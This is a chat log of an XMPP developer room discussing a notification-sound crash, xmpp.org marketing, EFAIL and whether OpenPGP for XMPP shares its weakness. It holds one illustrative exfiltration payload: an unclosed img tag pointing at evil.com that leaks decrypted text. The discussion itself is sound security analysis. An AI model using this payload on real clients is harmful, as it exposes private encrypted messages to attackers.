XSF Discussion - 2018-05-16

  1. MattJ

    Wow, Swift just crashed my Pulseaudio :)

  2. MattJ

    and then crashed itself

  3. MattJ

    Looks like one of my local test accounts had a $large number of offline messages

  4. Ge0rG

    ,oO( https://op-co.de/tmp/chatsecure-crash-iphone.mp4 )

  5. MattJ

    Nice :)

  6. MattJ

    It's like winning Solitaire

  7. jonasw


  8. jonasw

    how do a lot of offline messages crash pulseaudio.

  9. MattJ

    jonasw, notification sound. I think it probably tried to play thousands of them at once

  10. jonasw

    and opening a pulseaudio connection for each, I guess, probably by invoking paplay or something. that makes sense.

  11. jonasw

    but still a bug in pulse probably :)

  12. MattJ


  13. flow

    > jonasw> but still a bug in pulse probably :)

  14. flow

    not sure if lennart would agree

  15. jonasw

    AFAIK lennart isn’t involved with pulse anymore

  16. Zash

    I'm allergic to notification sounds. Probably forever scarred by how annoying that ICQ oh-oh sound got after a while.

  17. jonasw

    I feel you

  18. debacle

    Recently I complained about xmpp.org advertising XMPP as the "most secure" messaging standard. Some people agreed that "most secure" is not the most important feature to advertise XMPP with. And some people might even doubt that XMPP is exceptionally secure :~)

  19. debacle

    I suggest replacing "most secure" with the word "universal".

  20. Zash

    Secure in its awesomeness

  21. Seve/SouL


  22. Seve/SouL

    that's the idea for me

  23. debacle

    I believe that the most important aspect of XMPP compared to other, similar technologies is its "universal" approach. eXtensible for whatever one likes to do, useful for IoT, WebRTC, and social (below on xmpp.org), etc.

  24. Seve/SouL

    Something that would mean in a way 'the standard'

  25. Seve/SouL

    I like that

  26. daniel

    The literal battle tested might also not fly well with some people...

  27. Zash

    The Standard.

  28. Seve/SouL


  29. Zash

    It's probably fine for it to be bold

  30. debacle

    "Battle-tested" might also be something to change, true.

  31. Zash

    What was that saying about how to get replies on the Internet? State something wrong. People will flock to correct you.

  32. Zash

    debacle: That might actually be true in a literal sense.

  33. daniel

    Zash: that's the problem

  34. debacle

    Yes, but do you want to use this use case for the ads? :~)

  35. debacle

    Pacifists or anti-bellicists might go to Matrix then :~)

  36. daniel

    I mean I personally don't have issues with that. But advertising oneself as the protocol that is used to kill people (albeit indirectly) is probably not the best idea for some target audience

  37. debacle

    XEPs are lethal in some way...

  38. Zash

    XEPs don't kill people. People kill people.

  39. daniel

    That would make for a better slogan

  40. Kev

    I raised the tagline at the time. It was a deliberate decision by (then) Board.

  41. debacle

    Back to my complaint: Who could decide over s/most secure/universal/ on xmpp.org? (Or any other change?)

  42. Zash


  43. debacle

    Maybe also s/Battle-tested./Secure./ ?

  44. debacle

    Maybe also s/Battle-tested./Secure./ ?

  45. Zash

    Why not have bold marketing tho?

  46. debacle


  47. daniel

    Not everything that's bold is also good or useful. Advertising Conversations as trusted by ISIS and organized crime might be bold but arguably pretty bad marketing

  48. Zash

    All publicity is good publicity, as they say

  49. debacle

    The EFAIL was not good marketing, neither for PGP nor EFF.

  50. Zash

    When everyone has forgotten the details, they might remember "PGP". If so, then it was a success.

  51. vanitasvitae

    I should read that paper in depth at some point to evaluate its impact on OpenPGP for XMPP.

  52. Kev

    If people read the details, they'd see it had nothing to do with pgp in the first place :)

  53. debacle

    They remember "PGP is dangerous, I must uninstall it and replace with Signal"

  54. debacle

    They remember "PGP is dangerous, I must uninstall it and replace with Signal"

  55. Zash

    vanitasvitae: It wasn't about PGP, it was about MIME and email clients being terrible

  56. vanitasvitae

    Zash, no, it was also about PGP

  57. vanitasvitae

    PGP was just harder to attack

  58. moparisthebest

    not really, it was an HTML thing, you know, like xhtml-im

  59. daniel

    If you put xhtml in your ox one could maybe do something similar

  60. daniel

    Under some conditions

  61. daniel

    If you implemented both xhtml and your ox in a bad way that is

  62. vanitasvitae

    daniel, I suspect that XMPP would be vulnerable the same way. You could for example insert references. Or even HTTP-Upload links.

  63. vanitasvitae

    But I have to evaluate that in more depth

  64. Zash

    If you put [[<img src="http://evil.com/]] followed by PGP-encrypted data it went and did a HTTP query for evil.com/encrypted-secrets-here

  65. daniel

    Yeah I think you could deliberately design and implement ox in a way that is vulnerable. But I think that might be a bit harder. Because unlike the mime parsers it won't mix different parts of the stanza

  66. MattJ

    debacle, make a pull request on Github with your proposed change, and I'm sure everything will follow on from there

  67. debacle

    MattJ, will do, thanks!

  68. vanitasvitae

    by the look of things, OX puts the stuff that is interpreted as the message payload in an additional element (<signcrypt/> for example), so an attack would be very complicated. Harder than attacking email at least :D

  69. Zash

    As long as messages are either encrypted or not, it should be fine

  70. Wiktor

    who would've thought using stricter XML instead of lax HTML would prevent some attacks? /s the same style of attack: https://githubengineering.com/githubs-post-csp-journey/

  71. Zash

    Nah, who cares, kill XHTML

  72. Zash

    XHTML is dead, long live tag soup!

  73. Wiktor

    yep, that's the effect of this thinking, move fast break things, and XHTML-2 was claimed to be "bad" because it made people watch green screens of death

  74. Zash

    Nah, XHTML 2 was bad because it fixed stupid early mistakes in HTML

  75. Zash

    Like a single <h> instead of <h[1-6]>

  76. Wiktor

    single <h> is not as easy as it seems: https://jakearchibald.com/2017/do-we-need-a-new-heading-element/

  77. Link Mauve

    Wiktor, s/green/yellow/ :p

  78. Wiktor

    Link Mauve: yes, lol, I've imagined yellow but said green, weird

  79. moparisthebest

    I miss the good old days when I could link people to https://www.moparisthebest.com/no.html and if they opened it in IE it would blue-screen-of-death their computer

  80. moparisthebest

    because the img width/height were too large of integers...

  81. Wiktor

    deathpic.png, sounds dangerous

  82. Link Mauve

    This is scary at so many levels.

  83. Link Mauve

    Why would parsing an HTML integer trigger a kernel panic.

  84. moparisthebest

    yea everyone thought it was the image, it wasn't, it's an overflow with the tags :)

  85. moparisthebest

    Link Mauve, right? :)

  86. moparisthebest

    I want to say it was vulnerable to windows xp sp1, then sp2 fixed it

  87. Ge0rG

    "vulnerable to windows xp" - isn't that a problem affecting most PCs produced in the last decade?

  88. moparisthebest

    are there any XSD wizards in here that could tell me whether, according to this schema, I can have multiple <Property/> elements with the same type? http://docs.oasis-open.org/xri/xrd/v1.0/xrd-1.0.html#element.property

  89. moparisthebest

    like <Link bla><Property type="something">data1</Property><Property type="something">data2</Property></Link> ?

  90. moparisthebest

    http://docs.oasis-open.org/xri/xrd/v1.0/xrd-1.0.html#examples.2 has <Property type="http://spec.example.net/version">1.0</Property><Property type="http://spec.example.net/version">2.0</Property>

  91. moparisthebest

    so I guess the answer is yes? though what does "XRD Examples (Non-Normative)" mean? :)

  92. jonasw

    moparisthebest, I’m rather sure that XSD can’t express such things

  93. moparisthebest

    thanks jonasw , as an aside you've been doing an exceptional job as editor lately

  94. jonasw


  95. pep.

    only lately, before that it was crap

  96. lovetox